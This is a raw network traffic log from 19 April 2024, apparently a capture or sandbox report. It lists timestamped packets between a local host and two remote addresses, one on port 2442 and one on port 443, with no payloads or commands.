Apr 19, 2024 16:16:59.430157900 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430167913 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430170059 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430181980 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430192947 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430203915 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430207968 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430214882 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430227995 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430227995 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430239916 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430247068 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430253029 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430275917 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430299044 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430310965 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430324078 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.430335045 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.430352926 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.631464005 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.631525040 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.631563902 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.631597042 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.631603003 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.631709099 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641263962 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641309023 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641345978 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641370058 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641386986 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641424894 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641437054 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641463041 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641510963 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641711950 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641741991 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641757965 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641773939 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641783953 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641793013 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641809940 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641812086 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641830921 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641849041 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641853094 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641866922 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641882896 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641892910 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641900063 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641916037 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641916990 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641936064 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641952038 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.641957045 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.641993046 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.675950050 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.675971985 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.675983906 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.675995111 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676006079 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676018000 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676032066 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676035881 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676035881 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676047087 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676063061 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676070929 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676090956 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676182032 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676193953 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676204920 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676215887 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676225901 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676229954 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676240921 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676251888 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676261902 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676275015 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676285982 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676270962 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676290035 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676296949 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676310062 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676316023 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676316977 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676321983 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676333904 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676345110 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676352978 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676353931 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676357031 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676368952 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676377058 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676383018 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676394939 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676405907 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676405907 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676419020 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676431894 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676444054 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676465988 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676470995 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676510096 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676517010 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676547050 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676584959 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676590919 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676620007 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676656961 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676678896 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676693916 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676729918 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676742077 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676767111 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676803112 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676809072 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676839113 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676873922 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676879883 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676909924 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676948071 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.676958084 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.676985979 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677021980 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677028894 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.677059889 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677095890 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677103043 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.677131891 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677167892 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677180052 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.677206039 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677241087 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677251101 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.677278042 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677314043 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677320957 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.677350044 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677387953 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677393913 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.677426100 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.677485943 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.878876925 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.878901958 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.878914118 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.878925085 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.878940105 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.878952980 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.878968000 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:16:59.878968954 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.878969908 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.879060984 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:16:59.898308039 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:00.144848108 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:00.144942999 CEST	2442	49174	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:00.145021915 CEST	49174	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:06.787801027 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:06.787833929 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:06.787909985 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:06.799474955 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:06.799489975 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:07.188522100 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:07.190527916 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:07.220551014 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:07.220572948 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:07.220961094 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:07.432113886 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:07.432316065 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:07.633544922 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:07.676114082 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:08.754355907 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:08.804857016 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:08.804943085 CEST	443	49175	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:08.806487083 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:08.807972908 CEST	49175	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:09.001132011 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:09.001229048 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:14.019330025 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:14.019418955 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:14.265901089 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:14.266091108 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:14.513082981 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:14.513365030 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:14.567354918 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:14.567533970 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:14.759596109 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:14.759720087 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:14.813801050 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:14.813870907 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.006058931 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.006155968 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.006366014 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.006426096 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.007384062 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.007452011 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.007991076 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.008044004 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.060376883 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.060516119 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.255827904 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.255917072 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.256365061 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.256540060 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.256759882 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.256831884 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.257599115 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.257668018 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.258603096 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.258675098 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.259247065 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.259314060 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.259835005 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.259888887 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.260318041 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.260404110 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.306777000 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.308559895 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.451936007 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.502535105 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.502557993 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.502644062 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.502644062 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.503586054 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.503652096 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.504264116 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.504324913 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.504673004 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.504748106 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.505373001 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.505450010 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.506027937 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.506109953 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.507041931 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.507093906 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.507433891 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.507514000 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.509207010 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.509321928 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.510562897 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.510622025 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.510946035 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.511003971 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.512046099 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.512139082 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.689577103 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:15.689609051 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:15.689671040 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:15.698216915 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.698369980 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.698379993 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.698448896 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:15.700125933 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.700726032 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.702229977 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.741921902 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:15.741992950 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:15.748770952 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.748904943 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.750000000 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.750710011 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.751450062 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.752778053 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.753391981 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.753705025 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.754798889 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.755517960 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.756243944 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.756956100 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.758337975 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.759147882 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.759347916 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.760454893 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.761814117 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.762588024 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.764658928 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.765351057 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.766169071 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.766793966 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.767471075 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.768174887 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.944729090 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.945313931 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:15.946314096 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:16.074595928 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:16.107434034 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:16.107516050 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.113322020 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.113331079 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:16.113584995 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:16.195849895 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.240113974 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:16.314419985 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:16.560360909 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:16.776998997 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:16.777081013 CEST	443	49178	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:16.777132034 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.778559923 CEST	49178	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.813623905 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:16.940213919 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.940258026 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:16.940311909 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.944787025 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:16.944811106 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:17.317498922 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:17.317612886 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:17.339787006 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:17.339808941 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:17.340411901 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:17.548171043 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:17.548243999 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:17.576564074 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:17.624116898 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:18.292599916 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:18.292881012 CEST	443	49179	13.107.137.11	192.168.2.22
Apr 19, 2024 16:17:18.292941093 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:18.294233084 CEST	49179	443	192.168.2.22	13.107.137.11
Apr 19, 2024 16:17:21.545514107 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:21.624376059 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:21.791708946 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:21.791765928 CEST	2442	49176	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:21.791891098 CEST	49176	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:21.886964083 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:21.887044907 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:26.909671068 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:27.223794937 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.223992109 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:27.505490065 CEST	2442	49182	80.85.152.161	192.168.2.22
